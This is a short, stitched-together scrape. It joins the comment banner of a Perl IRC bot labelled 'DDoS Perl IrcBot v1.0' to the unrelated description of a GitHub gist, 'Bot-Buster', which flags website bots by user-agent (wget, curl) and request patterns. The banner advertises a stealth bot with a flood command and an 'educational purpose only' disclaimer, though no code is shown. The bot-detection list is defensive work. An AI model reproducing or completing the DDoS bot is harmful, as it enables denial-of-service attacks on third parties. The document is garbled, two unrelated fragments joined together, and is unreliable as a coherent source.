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## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] #########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##
hsiboy /
Last active August 23, 2024 12:39
Bot-Buster™ - Tracks nefarious activity on website, and manages accordingly.


Tracks nefarious activity on website, and manages accordingly.

It's probably a bot.

If the requesting entity:

  • declares its user-agent as being wget, curl, webcopier etc - it's probably a bot.
  • requests details -> details -> details -> details ad nauseum - it's probably a bot.
  • requests the html, but not .css, .js or site furniture - it's probably a bot.